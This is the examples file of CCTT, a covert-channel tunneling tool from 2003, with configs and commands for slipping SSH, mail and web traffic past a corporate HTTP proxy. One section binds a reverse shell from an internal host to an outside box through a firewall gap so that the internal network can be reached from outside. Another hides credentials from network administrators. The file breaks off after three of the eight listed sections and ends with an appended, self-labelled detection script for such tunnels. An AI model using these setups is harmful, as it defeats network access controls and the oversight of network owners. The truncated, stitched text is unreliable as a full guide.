CCTT - Covert Channel Tunneling Tool v0.1.8 - EXAMPLES
Copyright (C) 2002,2003 Simon Castro - scastro@entreelibre.com
$Id: EXAMPLES,v 1.15 2003/08/31 10:34:21 simsim Exp $

================================================================================

This file is part of CCTT - Covert Channel Tunneling Tool v0.1.8 (C) Simon
Castro.

CCTT is free software; you can redistribute it and/or modify it under the terms
of the GNU General Public License as published by the Free Software Foundation;
either version 2 of the License, or (at your option) any later version.

CCTT is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with
CCTT; if not, write to the Free Software Foundation, Inc., 59 Temple Place,
Suite 330, Boston, MA 02111-1307 USA

================================================================================

Considering your local network (and access control system) scheme connected to
the Internet and the CCTT functionalities you want, here are a few examples of
client/server configuration files and command line parameters you should use.

   I) Pass through an HTTP Proxy network scheme to access several external services
  II) Pass through a network scheme having UDP 'holes'.
 III) Use HTTP Login/Password credentials on an external Website with CCTT
  IV) Use the CCTT client only to get the Proxy Chain functionality
   V) Reverse proxy mode concept demonstration with CCTT
  VI) HTTP Mode : Creating confusion sending / receiving unnecessary HTTP messages
 VII) HTTP Mode : Creating confusion customizing what the server looks like
VIII) HTTP Mode : Creating confusion adding padding to channel data

================================================================================

I) Pass through an HTTP Proxy network scheme to access several external services

 A] Local network scheme

    A usual local network scheme may have one way out : The HTTP Proxy... but it
    often allows connections to remote Web servers on TCP port 443 with the
    CONNECT method.

    We assume that we know the proxy IP address : 192.168.1.1 and its listening
    port : 8080.

 B] CCTT functionalities

    We want, from the local network :
     * SSH access to our personal box connected to the Internet (111.222.1.1).
     * SMTP access to our personal ISP smtp server (111.222.2.1).
     * POP access to our personal ISP pop server (111.222.2.2).

 C] Configuration files

    Our personal box configuration must be :
     * SSH server listening on the loopback.
     * Firewall allows In/Out to our ISP smtp and pop servers.
     * A restricted user (without shell, no rights) whose name is cctt.
     * A chroot directory : jail.
     * And finally, we must have superuser access to execute the CCTT server
       part.

    The server configuration file (srv_example_1.cf) must look like the
    following :

        PROTOCOL=tcp
        IDENT=basic_ident
        IDENT_KEY=simsim
        SRV_SHELL_LOC=/usr/local/bin/false
        SRV_SHELL_CMD=false
        PROXY_MODE_LIST=ssh:127.0.0.1:22
        PROXY_MODE_LIST=smtp:111.222.2.1:25
        PROXY_MODE_LIST=pop:111.222.2.2:110
        PROXY_ONLY=ON
        PERM_USER_GROUP=cctt
        PERM_CHROOT=cage

    The client configuration files must look like the following :

      cl_example_1_ssh.cf :

        PROTOCOL=tcp
        CHANNEL_PROXY_IP=192.168.1.1
        CHANNEL_PROXY_PORT=8080
        CHANNEL_PROXY_PROT=tcp
        CHANNEL_PROXY_DEL=30000
        IDENT=basic_ident
        IDENT_KEY=simsim
        PROXY_MODE_LOCAL_IP=127.0.0.1
        PROXY_MODE_LOCAL_PORT=4222
        PROXY_MODE_PROT=tcp
        PROXY_MODE_REMOTE_IP=127.0.0.1
        PROXY_MODE_REMOTE_PORT=22

      cl_example_1_smtp.cf :

        PROTOCOL=tcp
        CHANNEL_PROXY_IP=192.168.1.1
        CHANNEL_PROXY_PORT=8080
        CHANNEL_PROXY_PROT=tcp
        CHANNEL_PROXY_DEL=30000
        IDENT=basic_ident
        IDENT_KEY=simsim
        PROXY_MODE_LOCAL_IP=127.0.0.1
        PROXY_MODE_LOCAL_PORT=4225
        PROXY_MODE_PROT=tcp
        PROXY_MODE_REMOTE_IP=111.222.2.1
        PROXY_MODE_REMOTE_PORT=25

      cl_example_1_pop.cf :

        PROTOCOL=tcp
        CHANNEL_PROXY_IP=192.168.1.1
        CHANNEL_PROXY_PORT=8080
        CHANNEL_PROXY_PROT=tcp
        CHANNEL_PROXY_DEL=30000
        IDENT=basic_ident
        IDENT_KEY=simsim
        PROXY_MODE_LOCAL_IP=127.0.0.1
        PROXY_MODE_LOCAL_PORT=42110
        PROXY_MODE_PROT=tcp
        PROXY_MODE_REMOTE_IP=111.222.2.2
        PROXY_MODE_REMOTE_PORT=110

 D] Command line parameters to run CCTT

    To run the server part, we use (root account) :

        cctt -s 111.222.1.1 -p 443 -f srv_example_1.cf -t socket_encode -L -v &

    To run the client parts, we use (no root account) :

        cctt -c 111.222.1.1 -d 443 -f cl_example_1_ssh.cf \
             -t socket_http_proxy_encode -a &
        cctt -c 111.222.1.1 -d 443 -f cl_example_1_smtp.cf \
             -t socket_http_proxy_encode -a &
        cctt -c 111.222.1.1 -d 443 -f cl_example_1_pop.cf \
             -t socket_http_proxy_encode -a &

    We now have 3 TCP ports listening on the box loopback located on the
    internal network :
     * the 4222 port allows us to reach our Internet personal box using the SSH
       protocol.
     * the 4225 port allows us to reach our ISP Smtp external server.
     * the 42110 port allows us to reach our ISP Pop external server.

    The CCTT server is running on our Internet personal box with restricted
    privileges, jailed in the 'cage' directory and is sending verbose messages
    to the local Syslogd.

================================================================================

II) Pass through a network scheme having UDP 'holes'.

 A] Local network scheme

    The network scheme we want to pass through is built with a badly configured
    network access control system, and we know that it is possible to reach,
    from a box of the internal network, an Internet remote server listening on
    the 7272 UDP port.

 B] CCTT functionalities

    We want to initiate a UDP connection to the Internet remote server
    (111.222.1.1:7272) and bind a reverse-shell to it so that we'll have access
    to the internal network from the outside box.

 C] Configuration files

    Our personal box configuration must be :
     * Firewall allows In/Out UDP datagrams on the 7272 port.
     * A restricted user (without shell, no rights) whose name is cctt.
     * A chroot directory : jail.
     * And finally, we must have superuser access to execute the CCTT server
       part.

    The server configuration file (srv_example_2.cf) must look like the
    following :

        PROTOCOL=udp
        IDENT=basic_ident
        IDENT_KEY=simsim
        SRV_SHELL_LOC=/usr/bin/false
        SRV_SHELL_CMD=false
        PERM_USER_GROUP=cctt
        PERM_CHROOT=cage

    The client configuration file (cl_example_2.cf) must look like the
    following :

        PROTOCOL=udp
        IDENT=basic_ident
        IDENT_KEY=simsim

 D] Command line parameters to run CCTT

    To run the server part, we use (root account) :

        cctt -s 111.222.1.1 -p 7272 -f srv_example_2.cf -t socket_encode -l &

    To run the client part, we use (no root account) :

        cctt -c 111.222.1.1 -d 7272 -f cl_example_2.cf -t socket_encode -r &

    Using the server's interactive mode, we now have access, from our Internet
    located box, to the internal protected network.

    NB : The shell session is saved in a log file.

================================================================================

III) Use HTTP Login/Password credentials on an external Website with CCTT

 A] Local network scheme

    The network scheme in this example is similar to the I) one, but any network
    scheme would have been convenient. This example focuses on the desired
    functionality.

    We know the HTTP proxy's IP address : 192.168.1.1 and its listening port :
    8080. We also know that it is possible to use the CONNECT method.

 B] CCTT functionalities

    We have to enter login/password on an Internet Website from our box located
    on the internal network. The problem is : 'the remote Web server doesn't
    have SSL enabled' and we don't want the network administrators to look at
    our credentials on the wire.

 C] Configuration files

    Our personal box configuration must be :
     * Firewall allows In/Out Tcp access to the remote Web server.
     * A restricted user (without shell, no rights) whose name is cctt.
     * A chroot directory : jail.
     * And finally, we must have superuser access to execute the CCTT server
       part.

    The server configuration file (srv_example_3.cf) must look like the
    following :

        PROTOCOL=tcp
        IDENT=basic_ident
        IDENT_KEY=simsim
        SRV_SHELL_LOC=/usr/local/bin/false
        SRV_SHELL_CMD=false
        PROXY_MODE_LIST=http:111.222.7.7:80
        PROXY_ONLY=ON
        PERM_USER_GROUP=cctt
        PERM_CHROOT=cage

    The client configuration file (cl_example_3.cf) must look like the
    following :

        PROTOCOL=tcp
        CHANNEL_PROXY_IP=192.168.1.1
        CHANNEL_PROXY_PORT=8080
        CHANNEL_PROXY_PROT=tcp
        CHANNEL_PROXY_DEL=30000
        IDENT=basic_ident
        IDENT_KEY=simsim
        PROXY_MODE_LOCAL_IP=127.0.0.1
        PROXY_MODE_LOCAL_PORT=4280
        PROXY_MODE_PROT=tcp
        PROXY_MODE_REMOTE_IP=111.222.7.7
        PROXY_MODE_REMOTE_PORT=80

 D] Command line parameters to run CCTT

    To run the server part, we use (root account) :

        cctt -s 111.222.1.1 -p 443 -f srv_example_3.cf -t socket_encode -L -v &
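
Seen from the HTTP proxy, the client setups in I) and III) appear as CONNECT tunnels from an internal host to a bare IP address on port 443, several of them to the same target in I). The following detection check is an added example, not part of CCTT or its documentation; the log lines are constructed in Squid's native access.log layout, and the function names and thresholds are assumptions.

```python
import ipaddress
from collections import defaultdict

# Constructed sample lines (not real traffic), Squid native access.log layout:
# time elapsed_ms client result/status bytes method target user peer type
SAMPLE_LOG = """\
1062325000.101 3600123 192.168.1.50 TCP_MISS/200 918234 CONNECT 111.222.1.1:443 - DIRECT/111.222.1.1 -
1062325001.412 3599870 192.168.1.50 TCP_MISS/200 20412 CONNECT 111.222.1.1:443 - DIRECT/111.222.1.1 -
1062325002.007 3599011 192.168.1.50 TCP_MISS/200 7719 CONNECT 111.222.1.1:443 - DIRECT/111.222.1.1 -
1062325100.550 1840 192.168.1.77 TCP_MISS/200 15320 CONNECT shop.example.com:443 - DIRECT/203.0.113.9 -
1062325200.300 950 192.168.1.77 TCP_MISS/200 4410 GET http://www.example.com/ - DIRECT/203.0.113.10 text/html
"""

def is_ip_literal(host):
    """True when the CONNECT target names an address instead of a hostname."""
    try:
        ipaddress.ip_address(host.strip("[]"))
        return True
    except ValueError:
        return False

def suspicious_connects(log_text, min_tunnels=2, min_elapsed_ms=30 * 60 * 1000):
    """Return {(client, target): [tunnel_count, longest_elapsed_ms]} for
    accepted CONNECT tunnels to bare IP addresses that are repeated or
    long-lived. Both thresholds are assumptions to tune per site."""
    stats = defaultdict(lambda: [0, 0])
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 7 or fields[5] != "CONNECT":
            continue
        if not fields[3].endswith("/200"):
            continue  # the proxy refused this tunnel
        elapsed, client, target = int(fields[1]), fields[2], fields[6]
        host = target.rpartition(":")[0]
        if not is_ip_literal(host):
            continue
        entry = stats[(client, target)]
        entry[0] += 1
        entry[1] = max(entry[1], elapsed)
    return {pair: entry for pair, entry in stats.items()
            if entry[0] >= min_tunnels or entry[1] >= min_elapsed_ms}

if __name__ == "__main__":
    for (client, target), (count, longest) in suspicious_connects(SAMPLE_LOG).items():
        print(f"{client} -> {target}: {count} tunnels, longest {longest // 1000}s")
```
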